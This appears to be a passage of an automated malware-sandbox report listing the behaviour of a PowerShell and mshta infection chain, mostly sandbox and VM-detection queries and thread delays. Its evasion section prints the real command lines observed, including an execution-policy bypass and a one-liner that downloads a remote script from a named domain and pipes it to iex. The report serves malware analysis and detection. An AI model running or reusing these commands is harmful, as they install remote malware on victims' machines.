        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_NetworkAdapter
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_NetworkAdapterConfiguration
        Query firmware table information (likely to detect VMs)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5033Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4805Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 857Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3551Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6256Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5100Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4948Thread sleep time: -18446744073709540s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_BIOS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_BaseBoard
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_ComputerSystem
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_ComputerSystem
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * from Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: ModuleAnalysisCache.0.drBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ROOT/cimv2user-PCComputer System ProductComputer System ProductECESRM0{B2A61728-75E7-4AA3-BB60-CDE5682DEEE2}B71434D56-1548-ED3D-AEE6-C75AECD93BF0VMware, Inc.NoneC/
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ROOT/cimv2user-PCComputer System ProductComputer System ProductECESRM1{B2A61728-75E7-4AA3-BB60-CDE5682DEEE2}l71434D56-1548-ED3D-AEE6-C75AECD93BF0VMware, Inc.None
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.em Product.dll
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringComputer System ProductComputer System ProductECESRM71434D56-1548-ED3D-AEE6-C75AECD93BF0VMware, Inc.None
        Source: ModuleAnalysisCache.0.drBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000000.00000002.4157924643.00000279C0DE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringComputer System ProductComputer System ProductECESRM71434D56-1548-ED3D-AEE6-C75AECD93BF0VMware, Inc.Noney*
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.45E
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ROOT/cimv2user-PCComputer System ProductComputer System ProductECESRM{B2A61728-75E7-4AA3-BB60-CDE5682DEEE2}71434D56-1548-ED3D-AEE6-C75AECD93BF0VMware, Inc.None
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.mberoductuct
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ROOT/cimv2Computer System ProductComputer System ProductECESRMC{B2A61728-75E7-4AA3-BB60-CDE5682DEEE2}w71434D56-1548-ED3D-AEE6-C75AECD93BF0487VMware, Inc.}NoneemRROOT/cimv23user-PC\etc
        Source: mshta.exe, 00000004.00000002.1784481356.000001B1378D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1765879308.000001B1378D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
        Source: powershell.exe, 00000000.00000002.4196679662.00000279DB763000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.DC-
        Source: ModuleAnalysisCache.0.drBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000000.00000002.4194333216.00000279DB1B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\v2yyl5sw.ufs.ps1" Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $t = Iwr -Uri 'https://encrypthub.org/main/zakrep/worker.ps1'|iexJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
